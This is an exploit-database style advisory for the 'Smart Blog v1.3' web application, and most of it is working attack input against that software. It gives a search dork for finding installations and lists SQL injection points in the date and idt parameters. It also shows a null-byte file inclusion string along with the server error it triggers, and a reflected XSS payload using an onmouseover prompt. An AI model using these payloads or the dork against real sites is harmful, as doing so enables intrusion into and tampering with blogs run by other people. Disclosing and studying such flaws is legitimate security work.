=================================================================
| # Title : Smart Blog v 1.3 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Actionnée par smartblog
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Mullti
| # Download : http://www.p30vel.ir
================================================================
SQl inj :
http://127.0.0.1/tst/index.php?jour=22&mois=10&an=2014 (inject her)
http://127.0.0.1/tst/index.php?idt=1 (inject her)
File inclusion :
URL encoded GET input page was set to 1some_inexistent_file_with_long_name%00.html
Error message found:
<b>Warning</b>: fopen(template/default/html/tpl_1some_inexistent_file_with_long_name%00.html)
[<a href='function.fopen'>function.fopen</a>]:
failed to open stream: No such file or directory in <b>C:\AppServ\www\tst\lib\template.php</b> on line <b>4</b>
/tst/?page=1some_inexistent_file_with_long_name%2500.html
Xss :
/tst/?an=2014%22%20onmouseover%3dprompt(900632)%20bad%3d%22&mois=11
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================